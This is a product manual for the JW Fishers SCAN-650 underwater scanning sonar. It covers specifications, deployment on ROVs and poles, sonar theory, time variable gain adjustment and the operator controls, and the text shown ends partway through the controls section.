- EmbarrassedZebra6292 asked1 answer
- Anonymous asked1. A combinational circuit produces the binary multiplication of two unsigned 2-bit numbers, x1x0 an0 answers
- Anonymous askedF(A... Show moreDraw the NAND logic diagram for the following expression using multiple-level NAND gate circuit:
F(A,B,C,D,E) =AB’ + C’D’ + BC’ (A + B)
Note: B’ means B bar, B not. Same as C’ and D’. • Show less2 answers
- Anonymous askedb) Write the Boolean... Show more
Construct a 3x8 decoder.
a) Provide a truth table of the combinational circuit.• Show less
b) Write the Boolean equations.
c) Simplify the Boolean equations.
d) Draw the logic diagram.1 answer
- Anonymous askedb) Write th... Show moreConstruct a 4x1 input muliplexer.
a) Provide a truth table of the combinational circuit.
b) Write the Boolean equations.
c) Simplify the Boolean equations.
d) Draw the logic diagram • Show less2 answers
- Anonymous askedDesign a 4-input priority encoder with four inputs D0, D1, D2, and D3, with input D0 having the high... More »1 answer
- Anonymous askedConstruct an 8x1 multiplexer with two 4x1 and one 2x1 multiplexers. Use block diagrams for the three... More »1 answer
- Anonymous asked1 answer
- ngansoplili askedAssume you have a project with seven activities labeled A-G, as shown. Derive the earliest completio... Show moreAssume you have a project with seven activities labeled A-G, as shown. Derive the earliest completion time (or early finish – EF), the latest completion time (or late finish-LF), the latest completion time (or late finish –LF) and slack for each of the following tasks ( begin at time = 0) which tasks are on the critical path? Draw a Gantt Chart for these tasks.
Task preceding expected EF LF Slack Critical Path?
Even duration
A _ 5
B A 3
C A 4
D C 6
E B,C 4
F D 1
G D,E,F 5
• Show less1 answer
- Anonymous asked{ { '#', '#', '#', '#', '#... Show more
Use this 2 dimensional array to represent a maze:
static char maze[][] =
{ { '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#' },
{ '#', '.', '.', '.', '#', '.', '.', '.', '.', '.', '.', '#' },
{ '.', '.', '#', '.', '#', '.', '#', '#', '#', '#', '.', '#' },
{ '#', '#', '#', '.', '#', '.', '.', '.', '.', '#', '.', '#' },
{ '#', '.', '.', '.', '.', '#', '#', '#', '.', '#', '.', '.' },
{ '#', '#', '#', '#', '.', '#', '.', '#', '.', '#', '.', '#' },
{ '#', '.', '.', '#', '.', '#', '.', '#', '.', '#', '.', '#' },
{ '#', '#', '.', '#', '.', '#', '.', '#', '.', '#', '.', '#' },
{ '#', '.', '.', '.', '.', '.', '.', '.', '.', '#', '.', '#' },
{ '#', '#', '#', '#', '#', '#', '.', '#', '#', '#', '.', '#' },
{ '#', '.', '.', '.', '.', '.', '.', '#', '.', '.', '.', '#' },
{ '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#' } };
The #'s represent the walls of the maze, and the dots represent locations in the possible paths through the maze. A move can be made only to a location in the array that contains a dot.
Write a recursive method to walk through the maze. The method should receive as arguments a 12-by-12 character array representing the maze and the current location in the maze. The first time the method is called, the current location should be the entry point of the maze. As the method attempts to locate the exit, it should place the character 'x' in each square in its path.
There's a simple algorithm for walking through a maze that guarantees finding an exit (if there is one). If there is no exit, you will arrive at the starting location again.
The algorithm is as follows: From the current location in the maze, try to move one space in any possible direction (down, right, up, or left). If it's possible to move in at least one direction, call the method recursively, passing the new spot on the maze as the current spot. If it's not possible to go in any direction, back up to the previous location in the maze and try a new direction from that location. This is an example of recursive backtracking.
Program the method to display the maze after each move so the user can watch as the maze is solved. The final output of the maze should display only the path needed to solve the maze. If going in a particular direction results in a dead end, the x's going in that direction should not be displayed. To display only the final path, you could mark off spots that result in a dead end with another character (perhaps '0') - or you could just let the original dots be there. Just don't leave x's in dead end paths.
The user should be shown the maze each step of the way, showing the next step of progress and asking if they want to continue (y or n). When you hit a dead end, you do not have to back out step by step, but simply move back to the place the wrong move was made and continue from there. Remember that the dead end path should not contain x's • Show less1 answer
- ngansoplili askedEvaluate the software applications that have been developed to assist project managers in their job... Show moreEvaluate the software applications that have been developed to assist project managers in their job of planning and managing software development projects. Search computer magazines or the Web for recent reviews of project management software. Which packages seem to be the most popular? What are the relative strengths and weaknesses of each package? What advice would you give to someone intending to buy project management software for a personal computer? Why?
• Show less1 answer
- Anonymous asked1 answer
- SourCouch5342 askedWrite a program which calculates the integral of the funct... Show moreNO HALFWAY SOLVED OR UNCOMPLETED ANSWERS!!
Write a program which calculates the integral of the function
f(x)=B*exp(-x^2.5)+(A*x^n)/m!
on the interval from a to b (0<a<b). In the main program, scanf
a double value for n and a non-negative integer value for m,
nonzero double values for A and B, and positive double values for a and b>a.
Call the function Integr() to evaluate the integral.
Your main program should be followed by three functions:
double Integr(double n, int m, double A, double B, double a, double b)
double func(double x, double n, int m, double A, double B)
double mfact(int m)
When writing the function Integr(), use the program w4-10.c, appropriately
modified to integrate an arbitrary function f(x) from a to b
(let the program ask you for n_trap only once, and scan
sufficiently large value for n_trap; also print the length
of the corresponding sub-interval del_x). Within Integr() call another
function func() to evaluate f(x). The return value of func() should
be equal to B*exp(-x^2.5)+A*x^n if m=0, or B*exp(-x^2.5)+A*x^n/m! if m>0.
To evaluate m! call the function mfac() that you will also create.
To evaluate x^n call the function pow(), which is embedded in
the math.h library.
................................................................
Your output should look like this:
Enter the exponents (double)n and (int)m: 1.5 6
Enter the coefficients A and B: 2.5 -3.75
Enter the bounds for the integration interval, a < b : 1.05 4.05
Integrate f(x) on [a,b]
Enter the number of trapezoids: 10000
The length of the subinterval del_x = .......
The value of the integral is ...... .
• Show less1 answer
- Anonymous askedYou guys didnt do exercise 7.41 in the C++: how to program 7th edition by Paul Deitel, Harvey M. De... More »0 answers
- ngansoplili askedSuppose you are working in a consulting company that has been contracted to build a Web-based e-comm... Show moreSuppose you are working in a consulting company that has been contracted to build a Web-based e-commerce site for Poodles & Noodles Incorporated. In one of your initial conversations with the client, the client states, “I don’t want to waste time on unproductive things such as project management and planning. I want to start building this system immediately.” For each stage of the systems development cycle (SDC), do the benefits of performing the stage outweigh the costs? Which steps of the structured walkthrough can be omitted for this project? Do you think that the participants and their roles in the walkthrough would vary for a different project? Justify your response, and provide relevant examples.
• Show less0 answers
- Anonymous askedIs called copyD... Show moreThe header file for a C program is called "Question7.h". Write a C function which:
• Is called copyData
• Has the following parameters:
o A char pointer called originalFileName
o A char pointer called copyFileName
• Opens the file for reading whose name is contained in the originalFileName
parameter.
• If the file cannot be opened successfully then the function should just output an
error message to the user.
• Opens a file for writing whose name is contained in the copyFileName
parameter.
• If the file cannot be opened successfully then the function should just output an
error message to the user.
• The function should read the numbers listed in the file originalFileName and
write the numbers into copyFileName with a field width of 8 and 3 decimal
places.
• The file originalFileName contains integers stored on one line separated by
spaces. • Show less1 answer
- DecisiveSquare255 asked1)Modify the program Amortize by inserting a function FindPayment( ) that will compute the monthly p1 answer
- GoldenSushi4669 askedWrite a program to play lottery game. The program generates a random two-digit... Show morethis is the question..
and output should be as2 answers
- Anonymous askedConstruct a logic... Show more
Question 1;• Show less
Show that ~(p V (~ p Λ q) = ~
(Hint: don’t specify by taking sets, use general approach)1 answer
- Anonymous askedThe... Show moreFig. 11.30
(1) <L> -> ( <E> <T>
(2) <T> -> , <E> <T>
(3) <T> -> )
(4) <E> -> <L>
(5) <E> -> atom
The grammar in Fig. 11.30 defines nonempty lists, which are elements
separated by commas and surrounded by parentheses. An element can be either an
atom or a list structure. Here, <E> stands for element, <L> for list, and <T>
for “tail,” that is, either a closing ), or pairs of commas and elements ended by ).
Write a recursive-descent parser for the grammar of Fig. 11.30. • Show less0 answers
- Anonymous askedWrite a program to play lottery game. The program generates a random two-digit number and p... Show morequestion:.
output1 answer
- GroovyWing2560 asked1 answer
- Snail2011 askedint number,... Show more
import java.util.Scanner;
public class Assign
{
public static void main(String[] args)
{
int number, size;
char command;
Scanner scan = new Scanner(System.in);
// ask a user for a array size
System.out.println("Please enter a size for the array.\n");
size = scan.nextInt();
// instantiate a NumberCollection object
NumberCollection collection = new NumberCollection(size);
// print the menu
printMenu();
do
{
// ask a user to choose a command
System.out.println("\nPlease enter a command or type ?");
String input = scan.next();
command = input.charAt(0);
switch (command)
{
case 'a': // add a number
System.out.println("\nPlease enter an integer to add.");
number = scan.nextInt();
boolean added;
/*** ADD YOUR CODE HERE ******************************************************/
if (added == true)
System.out.println(number + " was added");
else
System.out.println(number + " was not added");
break;
case 'b': // remove a number
System.out.println("\nPlease enter an integer to remove.");
number = scan.nextInt();
boolean removed;
/*** ADD YOUR CODE HERE ******************************************************/
if (removed == true)
System.out.println(number + " was removed");
else
System.out.println(number + " was not removed");
break;
case 'c': // display the array
/*** ADD YOUR CODE HERE ******************************************************/
break;
case 'd': // compute and display the maximum
/*** ADD YOUR CODE HERE ******************************************************/
break;
case 'e': // compute and display the minimum
/*** ADD YOUR CODE HERE ******************************************************/
break;
case 'f': // compute and display the sum
/*** ADD YOUR CODE HERE ******************************************************/
break;
case '?':
printMenu();
break;
case 'q':
break;
}
} while (command != 'q');
} //end of the main method
// this method prints out the menu to a user
public static void printMenu()
{
System.out.print("\nCommand Options\n"
+ "-----------------------------------\n"
+ "a: add an integer in the array\n"
+ "b: remove an integer from the array\n"
+ "c: display the array\n"
+ "d: compute and display the maximum\n"
+ "e: compute and display the minimum\n"
+ "f: compute and display the sum\n"
+ "?: display the menu again\n"
+ "q: quit this program\n\n");
} // end of the printMenu method
} // end of the Assignment6 class
Number Collection ..... Java program 2
import java.text.NumberFormat;
import java.util.Scanner;
public class NumberCollection
{
private int count;
private int [] numberarray;
public NumberCollection ( int arraySize)
{
count = 0;
numberarray= new int[arraySize];
}
private int indexOf(int searchingNum)
{
for (int i = 0; i < numberarray.length; i++)
if (numberarray[i] == searchingNum)
return i; //return the index number of the desired searching number, if one is available
return -1;
}
public boolean addNumber(int numberToAdd)
{
if (this.indexOf(numberToAdd) == -1)
{
if (count < (numberarray.length - 1))
{
numberarray [count] = numberToAdd;//add the parameter number at the smallest available index
count++;
return true;
}
else if (count == (numberarray.length - 1))
{
//double arrayCapacity();
numberarray [count] = numberToAdd;
count++;
return true;
}
}
return false;//return false by default.
}
public boolean removeNumber(int numberToRemove)
{The method checks if the integer specified by the parameter exists in the array (This can be done using the indexOf method to see if it returns -1 or not) and if it does, it moves the number stored in the last index (count-1) to where numberToRemove was found, and changes the content at the last index (count-1) to 0, decrements count, and return true. Otherwise, it returns false.}
private void doubleArrayCapacity()
{It is a helper method and doubles the capacity of the numberArray. To do this, you will need to create another array with the doubled size first, then copy the content of numberArray to this temporary array. Then the address of the temporary array can be copied to numberArray.}
public int findMax()
{It finds the maximum number among the numbers stored so far (at the time when this method is called), and returns it. If the array is empty, return 0.}
public int findMin()
{It finds the minimum number among the numbers stored so far (at the time when this method is called), and returns it. If the array is empty, return 0.}
public int computeSum()
{It computes and returns the sum of numbers stored in the numberArray so far (at the time when this method is called.) If the array is empty, return 0.}
public String toString( )
{Returns a String containing a list of numbers stored in the numberArray. An example of such string can be:• Show less
(3, 6, -1, 3, 23, -50, 43)
The string should start with a '(' and end with a ')'.}1 answer
- Anonymous asked// The ball has a specific color, size, locati... Show more// Draw a bouncing ball on the window for 10 seconds.
// The ball has a specific color, size, location, and direction.
// (x,y) is the upper left corner of the first location.
// Every 10 ms, the ball should move dx pixels horizontally
// and dy pixels vertically.
public static void bounceLoop(DrawingPanel panel, Graphics g, Color c,
int size, int x, int y, int dx, int dy)
Each repetition should do the following:
1. Move the ball to a new position.
2. Update x and y. Specifically, add dx to x and add dy to y.
3. Update dx and dy if needed. The ball needs to change direction
(bounce) when the ball "hits" the side of the window.
4. Pause for 10 ms.
• Show less2 answers
- Anonymous asked1 answer
- Anonymous asked2 answers
- Anonymous asked0 answers
- Anonymous asked1 answer
- Anonymous asked1 answer
- Anonymous askedtypical users at a peak of 1... Show more,
RAID 5, and RAID 6. • Show less3 answers
- Anonymous asked2 answers
- Anonymous asked3 answers | http://www.chegg.com/homework-help/questions-and-answers/computer-science-archive-2011-november-01 | CC-MAIN-2014-52 | refinedweb | 18,193 | 64.1 |
Basic Event Handling in C#
To illustrate event handling, you will make a news service that notifies its subscribers when an event (new news) occurs. Subscribers can unsubscribe and subscribe at will.
The Delegate
The delegate lets the subscriber know what type method can be notified. Essentially, the news service says "In case of an event occurring, I'll notify any registered method so long as it has the same signature as the delegate" and the subscriber says, "Okay, register this method." The method could be in any class.
You will use the following classes:
- NewsService: Notifies the subscribers when events (new news) occur.
- Subscriber: Instances subscribe to the news service, indicating what method should be notified.
- News: Instances of this class are the parameters passed from the news service to the registered method. Contrary to what most people seem to think, it does not have to inherit from EventAgs. Any parameters can be passed.
using System; // The delegate indicates what types of methods can be notified of // an event. // The method(s) must have the same signature as the delegate. public delegate void NewsDelegate(News news); public class News { public string news; public News(string news) {this.news=news;} } // This class notifies subscribers when the specified event occurs. // In this case, the event is that newNews() is called. public class NewsService { // Must have the following format: public event delegateName // anyName public event NewsDelegate NewsEventSubscribers; public void newNews(string news) { Console.WriteLine("An event! New news."); // first check whether there are subscribers to this event if (NewsEventSubscribers !=null) { // This will send an instance of News to each subscriber of // local news NewsEventSubscribers(new News(news)); } } public NewsService(){} } public class Subscriber { public string name; NewsDelegate delNews; public void SubscribeNewsService(NewsService ns) { // Create a new NewsDelegate. Its parameter is the method to // notify when the event occurs. This method also may be in // another class, in which case the parameter is // InstanceOfSomeOtherClass.method. delNews=new NewsDelegate(WriteNews); // Register the delegate with the NewsService ns.NewsEventSubscribers +=delNews; Console.WriteLine(name + " subscribed to news."); } public void UnsubscribeNewsService(NewsService ns) { // unsubscribing ns.NewsEventSubscribers -=delNews; Console.WriteLine(name + " unsubscribed to news."); } // This method must have the same signature as // the delegate NewsDelegate declared above. public void WriteNews(News e) { Console.WriteLine(name + " received news: " + e.news); } public Subscriber(string name) {this.name=name;} } class MakeNews { static void Main(string[] args) { NewsService ns=new NewsService(); Subscriber julie=new Subscriber("Julie"); julie.SubscribeNewsService(ns); Subscriber matthew=new Subscriber("Matthew"); matthew.SubscribeNewsService(ns); ns.newNews("More money for schools."); julie.UnsubscribeNewsService(ns); ns.newNews("New mayor."); } }
The output:
Julie subscribed to news. Matthew subscribed to news. An event! New news. Julie received news: More money for schools. Matthew received news: More money for schools. Julie unsubscribed to news. An event! New news. Matthew received news: New mayor. | https://www.codeguru.com/csharp/.net/net_general/eventsanddelegates/article.php/c8891/Basic-Event-Handling-in-C.htm | CC-MAIN-2020-16 | refinedweb | 468 | 60.51 |
My teacher makes us use prn statements after every single cout so we can
show our work. Anyway, I just got C++ at home and I can't get the prn's to
work.
Here's my simple program
#include <fstream.h>
#include <iostream.h>
#define PRINT_IT ofstream prn("PRN")
PRINT_IT;
main()
{
cout << "Blah";
prn << "Blah";
return 0;
Blah comes up on the screen and nothing goes out the printer. Any ideasBlah comes up on the screen and nothing goes out the printer. Any ideasQuote:}
would help greatly. I have an HP 722C printer if that is of any help on
LPT1. That is how it is set up at school exactly and it won't work at home. | http://www.verycomputer.com/41_6a0065e4a62dad83_1.htm | CC-MAIN-2020-16 | refinedweb | 119 | 92.73 |
This C++ program demonstrates overloading of assignment (=) operator. The program defines a class, defines the assignment operator for the class, creates an instance of the class and demonstrates its use.
Here is the source code of the C++ program which demonstrates overloading of assignment (=) operator. The C++ program is successfully compiled and run on a Linux system. The program output is also shown below.
/*
* C++ Program to Demonstrate Overloading of Assignment (=) Operator
*/
#include <iostream>
using namespace std;
class Int {
int i;
public:
Int(int ii = 0) : i(ii) { }
Int operator=(const Int& ii) { i = ii.i; }
int get() { return i; }
void set(int ii) { i = ii; }
};
int main()
{
Int a(10), b(20);
cout << "Initial values" << endl;
cout << "a::i = " << a.get() << endl;
cout << "b::i = " << b.get() << endl;
cout << "After operation a = b" << endl;
a = b;
cout << "a::i = " << a.get() << endl;
cout << "b::i = " << b.get() << endl;
}
$ a.out Initial values a::i = 10 b::i = 20 After operation a = b a::i = 20 b::i = 20
Sanfoundry Global Education & Learning Series – 1000 C++ Programs.
If you wish to look at all C++ Programming examples, go to C++ Programs. | http://www.sanfoundry.com/cpp-program-demonstrate-overloading-assignment-operator/ | CC-MAIN-2018-09 | refinedweb | 191 | 66.54 |
SCAN-650 Scanning Sonar OPERATION MANUAL JW FISHERS MFG INC rev 811
- Jayson Warner
- 3 years ago
- Views:
Transcription
1 SCAN-650 Scanning Sonar OPERATION MANUAL JW FISHERS MFG INC rev JW FISHERS MFG INC 1953 COUNTY ST. E. TAUNTON, MA USA (508) ; (800) ; FAX (508) WEB:
2 SCAN-650 Scanning Sonar OPERATION AND MAINTENANCE MANUAL Surface Sonar Processor Included 2 JW FISHERS MFG INC 1953 COUNTY ST. E. TAUNTON, MA USA (508) ; (800) ; FAX (508) WEB:
3 TABLE OF CONTENTS CAUTIONS... 4 SPECIFICATIONS AND OPTIONS... 5 MINIMUM SYSTEM REQUIREMENTS... 6 INTRODUCTION... 7 SYSTEM COMPONENTS... 9 THEORY OF OPERATION OPERATOR SWITCHES AND CONTROLS INSTALLING HARDWARE AND SOFTWARE CABLING THE SYSTEM ATTACHING TO ROV OPERATION SAMPLE PLAYBACK SAMPLE RECORDING FAQs TROUBLESHOOTING APPENDIX A (configuring GPS) APPENDIX B (USB to Serial Adaptor) MAINTENANCE WARRANTY
4 CAUTIONS: Do not allow the SCAN-650 to be exposed to excessive heat by leaving it in direct sunlight or inside of a closed vehicle on a hot day. Excessive heat can buildup inside the housing which can damage the electronics and/or destroy the waterproof seals. Take special care of the black flexible boot located on the top of the scanning head. The black flexible boot is an acoustic window that should be keep clean (soap and water) and protected from damage. Do not remove the (6) screws that hold the black flexible boot in place on the scanning head in-place. The scanning head contains a liquid that will drain out if the screws are loosened. Do not remove the black hex head bolt on the scanning head (this is only on the 2 piece SCAN-650). When mounting the scanning head, be sure the arrow on top of the scanning head is pointing forward, this will be the top of the screen on the PC. 4
5 SPECIFICATIONS PERFORMANCE/DESCRIPTION: Frequency khz. Beamwidth - horizontal x vertical deg by 40 deg. Ranges:... 5, 10, 20, 40, 60 meters , 33, 66,132,198 feet Max depth m / 1,000 ft. Input voltage - Sonar Processor vdc or 120/220 vac (5 watt). - Scanning Head... from Sonar Processor or 9-36 from ROV. Cable... 2 or 4 conductor. DIMENSIONS/WEIGHT: Sonar Processor... 8 Wx9"Dx2.5"H... 2 lbs / 0.9 Kg. 650A: Scanning Head and housing "Dia x 10.5"L lbs 1.6 Kg (air) lbs / 0 Kg (water). 650B: Scanning Head "Dia x 4"L lbs /.6 Kg. (air) lbs /.17 Kg. (water). Housing Dia x 9"L lbs 1.2 Kg (air) lbs / 0 Kg (water). Note: If 180 sweep, cut times in half; if 90 sweep, cut times by four, etc. up to 600 meters / 2,000 feet of cable Carrying case OPTIONS 5
6 CPU: Intel or AMD. 500MHz SCAN-650 MINIMUM SYSTEM REQUIREMENTS System memory: 64 Mb RAM (Faster CPU and more RAM will allow faster scanning) One available USB port Windows 98 or later 15 Mb of free disk space for program installation Disk space for file recording: 5 Meter Range.5 deg step meg/hr hrs/cd, 90 hrs/dvd 2 deg step meg/hr hrs/cd, 200 hrs/dvd 10 Meter Range.5 deg step meg/hr hrs/cd, 170 hrs/dvd 2 deg step meg/hr hrs/cd, 270 hrs/dvd 60 Meter Range.5 deg step meg/hr hrs/cd,345 hr/dvd 2 deg step meg/hr hr/cd, 400 hr/dvd Video Card capable of: 16 bit color Screen Area of 800 x 600 pixels (minimum) Optional: CD or DVD burner for archiving files Note: For the fastest scanning capability, shut down all other programs (including virus scan). 6
7 INTRODUCTION The SCAN-650 is a high performance imaging sonar system available in two different package configurations which enables it be used on large or small ROVs. It can also be pole-mounted and used from a small boat in shallow water. The SCAN-650A configuration is used with larger ROVs, or when the main application is boat deploying the unit on a pole (see photo next page). The black scanning head is connected permanently to the electronics module. A cable (not shown) comes out of the bottom of the electronics module and connects to the Sonar Processor. The SCAN-650B configuration is used with smaller ROVs. The black scanning head is mounted to the front of the ROV and a short cable connects the head to the electronics module which is mounted on the side or under the ROV. Cabling options include a hardwired version where a cable comes out of the bottom of the of the electronics module and connects directly to the Sonar Processor or a set of short wires equipped with under water connectors and a hull penetrator. This option allows the wiring from the scanning head to enter the ROV. The scannin head can draw power from the ROV and utilize (2) spare wires in the ROV umbilical cable for communication with the Sonar Processor. The Sonar Processor is located in the boat and allows fine tuning of the signal from the electronics module prior to being displayed and recorded on the PC display. It is used with both of the above models. The Sonar Processor also includes an interface for a GPS receiver. 7
8 Mounting the scanning head on a pole allows it to be deployed from a boat in shallow water. SCAN When operating in shallow water, the scanning head can taped or clamped to a pole and deployed over the side of a boat or off a dock. Pole must be held very steady (and no waves if deployed from a boat) to insure a clear picture. If the surface conditions are too rough, the scanning head can be attached to a tripod and lowered to the bottom (2 off bottom for small targets) to provide clear images. There are times when it is advantages to deploy the scanning head inverted (upside down). This might occur when deploying on a pole. The software allows inverted scanning (see Settings Menu pg 18.) Pole SCAN-650 Transducer (black end) is positioned downward when operating with a pole. Be sure transducer is below bottom of pole (so pole does not interfere with signal). Tripod deployment The target below is a pickup truck (note large black shadow) located in 18 feet of water. The scanning head was mounted on a pole which was deployed from a small boat (see top photo). The most common application is mounting the scanning head on an ROV. The ROV can rest on the bottom or hover just off the bottom and the sonar scans 360 degrees looking for targets. SCAN-650 scanning head mounted on Fishers SeaLion ROV. 8
9 SYSTEM COMPONENTS Signals from the scanning head travel up the cable to the Sonar Processor on the surface. The signals are processed and sent to the PC where the signal is displayed and recorded. The boat s GPS receiver can also be connected to the Sonar Processor. If connected, the boat s Latitude and Longitude will be displayed and recorded by the PC. Transducer Head and Electronics cable to surface Sonar Processor PC (customer supplied) Boat s GPS USB Port The Sonar Processor connect to any available USB port on the PC. (Note: It is best to use the same physical USB port every time you operate) The Sonar Processor can be powered by 9-12 vdc. A 120/220 vac to 12 vdc wall transformer is supplied to power the system from a 120/220 ac voltage supply. A cable with battery clips is supplied to power the sonar from a 12 volt battery. Wall Transformer Cable for 12 v battery 9
10 LEFT BLANK 10
11 THEORY OF OPERATION SONAR BASICS Sonar is the bouncing of an acoustic signal off a target and then measuring the time it takes to return - thus giving us distance, and measuring the size or amplitude of the returned signal - thus giving us hardness of the target. Since the speed of sound in water is known (1500 meters per second), it is easy to determine the distance to a target by simply measuring the time it takes to make the round-trip and dividing by two. If we examine the size of the returned signal (amplitude), we can determine if the sonar signal hit a soft object (mud bottom) or a hard object (rocky bottom). The muddy bottom will absorb much of the signal with very little signal (echo) being returned. The rocky bottom produces a large echo which is called a hard return. The acoustic signal is produced by a transducer. In operation, the transmitter generates an electrical pulse which is applied to the transducer. The transducer converts this pulse to a mechanical vibration which produces an oscillating pressure wave in the water thus forming a sound pulse. The pulse then travels away from the transducer until it strikes an object at which point some portion of the pulse is reflected back to the transducer as an echo. When the echo returns to the transducer, the transducer is mechanically excited by the sound pressure and converts the vibration into an electrical signal. This signal is then detected and amplified by the receiver. The control/display unit regulates the precise timing between the transmitters, receiver and display elements. DEPTH SOUNDER Depth sounders are a simple form of sonar. They send out a conical shape energy pulse toward the bottom, listen for the return, calculate the time it took, and displays the answer in feet (of depth). If your depth sounder has a display or a printout, a line will be drawn representing the bottom. Because the beam is so wide (15 to 30 deg), the beam will be on the object for a long time as you pass over it. As a result, even smaller objects appear to be quite large on the printout. Fish show up as large arcs on the display. Depth sounders typical operate at a frequency of between 50kHz and 200kHz. Good for long range but not for detecting small targets SCANNING SONAR Scanning sonar refines the process by decreasing the beam width to a very narrow 2 deg (2 deg by 40 deg fan shaped beam) and dramatically increasing the frequency of the signal (typically 600kHz range). The very narrow fan shaped beam and high frequency dramatically improves the detail of the objects on the bottom. The fact that scanning sonar sweeps the beam back and forth across the bottom gives a major improvement over the depth sounder printout for bottom detail. Not only can very small targets be detected but the details of the target can be seen. Signal SCAN-650 SCAN-650 Signal Side View (fan shaped signal) Top View (very narrow signal) 11
12 THEORY OF OPERATION (continued) Fish Transducer The JW Fishers SCAN-650 scanning sonar operates by transmitting a short, high energy, narrow width acoustic wave. This high energy acoustic wave hits directly below the transducer first (as shown below) Acoustic Wave 100 m Range Switch Target #1 Target #2 3 meters 10 m Fish Transducer 25 meter range 100 m As the pulse continues to sweep across the bottom, away from the transducer, echoes continuously return to the transducer (see below). The returning echos strike the transducer which produce the return electrical signals. A look at returning echoes Returning Echos 100 m Range Switch Hard Return No Return Echos (Shadow) #1 Light Return Medium Return Acoustic Wave Hard Return #2 3 meters 10m 25 meter range 100 m The harder the object (rocks, metal, etc ), the larger the returned echo. The angle of the bottom surface and target angles also impact the amplitude of the return signal. The left side of target #1 and #2 will produce a larger (harder) return echo than the top area. When the acoustic wave hits the top of the target, some of the echo is reflected away from the fish. When the bottom slopes away and down from the fish, only light echo s return from the bottom. When the bottom slopes upward, medium echo returns are received. If a hard target is positioned on a down or on a up-sloping bottom, a hard return will result from the target. If a target is up off the bottom, as is target #1 and #2, then there will be an area directly behind the target that will be blocked from the acoustic wave. No echo returns will be received from that area by the fish. When displaying this area, the display will show a no signal color. This area on the display is called the target s shadow. The return electrical signals are amplified by the preamp and sent up the cable to be processed by the time variable gain (TVG) circuit in the Sonar Processor. (Refer to page 15 for a more details on the TVG circuit.) 12
13 THEORY OF OPERATION (continued) After the return signals are processed by the TVG, the Sonar Processor takes evenly spaced samples of the echo returns which are processed and displayed on the PC screen as a very narrow sector that changes color along it s length depending on the intensity of the reflected signal.the amplitude of the returned echo samples, during one line, determines the color for each point along the line. The larger the amplitude of the return, the greater the change of color on the display. Every one pulse out of the transducer fills one degrees per step sector. Screen View 0 deg 270 deg Single line displayed on the screen. The width of this sector is determined by the Degrees per Step setting. SCAN deg 180 deg Continuous 360 degree sweep or any portion of 360 degrees. After the line is displayed, the transducer head (scanning head) rotates (steps) slightly to the right and the sequence is repeated. The smaller the step (1/2, 1, 1 1/2, or 2 degree) the higher the resolution of the picture. The transducer s continuous stepping fills the display with the sonar image. The sequence is repeated, and if nothing moves (targets or sonar), then the identical picture will be overlaid over the previous picture (one line at a time). If a 360 degree continuous sweep is selected, at 1 degree steps, then 360 steps will make up a complete picture (720 steps for 1/2 degree). 13
14 TIME VARIABLE GAIN (TVG) The Sonar Processor contains a TVG circuit on the PC board that receives the echo signals from the fish preamplifier boards. The TVG circuit amplifies and makes time variable gain adjustments to the signal to make up for signal losses which occur when the echoes are traveling through the water; the greater the range, the greater the losses. TheTVG circuit has its own set of operator controls which are located of the Sonar Processor s top panel. The controls are NEAR GAIN, FAR GAIN, and OVERALL GAIN. The signal return (Fig 2) to the Sonar Processor is the signal that we would expect to see at the output of the fish preamps. The amplitude of the signal that reaches the Computer determines the color of the image. If the TVG circuit did not modify the signal shown below (Fig 2), then the display would start out good, but the bottom return would quickly turn to a color indicating no return. If the return from target #2 was real strong, it might "pop out" of the light background and print a light image. Fish Transducer Acoustic Wave Fig m Range Switch Target #1 Target #2 3 meters 10 m 25 meter range 100 m A m p l i t u d e #1 Shadow Fig 2 Signal to Sonar Processor before TVG Transmit pulse 8" Next transmit pulse #2 Shadow The signal (Fig 2 ) feeds the input of the TVG amp. The TVG amp has been adjusted, by the operator, to automatically increase the gain over time. The next drawing below (Fig 3) shows the gain increase (called the ramp). The last drawing below (fig 4)shows the output of the TVG amp with the ramp applied to the input. When this signal is displayed, there will be a even color across the paper with two light colors representing the two targets. G a i n Low Gain Fig 3 High Gain Transmit pulse Next transmit pulse A m p l i t u d e Transmit pulse Fig 4 #1 #2 Signal with TVG ramp applied Shadow Shadow Next transmit pulse 14
15 The TVG amplifier has three operator controls. They are located on the top panel of the Sonar Processor. Recommended settings for the TVG controls are provided in the Operation Section of this manual. Final TVG adjustments are made by the operator while the unit is running. The function of these controls is to adjust the amplifiers to compensate for losses that occur when the signal travels through the water. When they are adjusted properly, a reasonably even color is displayed across the screen during side scanning. The even color is the result of reflections off the bottom. 5 6 LEFT TVG CHANNEL ADJUSTMENTS GAIN OVERALL NEAR GAIN FAR GAIN OVERALL NEAR GAIN GAIN Near Gain - Adjusts the TVG gain at the start of the sweep (objects close to the scanning head). Far Gain - Adjusts the TVG gain at the finish (objects furthest from the scanning head). Operator adjusts for even color of the displayed line. Overall Gain - Adjusts the gain of the complete line up or down. It adjusts overall darkness or lightness. A m p l i t u d e Near Gain Overall Gain Increases Or Overall gain adjusts the overall amplitude of the signal Decreases (increases The Overall or Gain decreases it). (Amplitude) Of The Complete Line Far Gain 15
16 OPERATOR SWITCHES AND CONTROLS THE HARDWARE Scanning Head(transducer module): The scanning head does not contain any operator switches or controls. The scanning head is factory calibrated and should not be opened. Sonar Processor: The Sonar Processor amplifies and conditions the signal from the scanning head. The amplifier in the Sonar Processor is called a Time Variable Gain (TVG) amplifier. The gain of the amplifier increases over time for each returning signal. The operator has very precise control of the TVG amplifier using the three gain controls. The Near Gain, Far Gain, and Overall Gain controls on the front of the Sonar Processor are adjustments for the Time Variable Gain (TVG) amplifier. The goal of these adjustments is to adjust the amplifiers to compensate for signal losses that occur when the signal travels through the water. When they are adjusted properly, a reasonably even color will represent the ocean floor from the center to the outer edge of the scanned area. (See page 15 for a detailed description of the TVG) SONAR PROCESSOR Computer: The system will run on a Laptop, Desktop, or on JW Fishers optional Splash Proof computer. The Splash Proof is a computer system that is built into a Underwater Kinetics case. It utilizes a 10 Ultra Bright display which is much easier to read in a open boat.the Sonar Processor has an integrated interface board that converts the analog signals to digital, and inputs the signal to the computer. The computer takes the digital signal, displays it, and stores it for future reference. The software has numerous toolbars and pull down menus for controlling the display. There is also communications from the computer to the transdcucer which allow the operator to control different functions within the Fish. 16
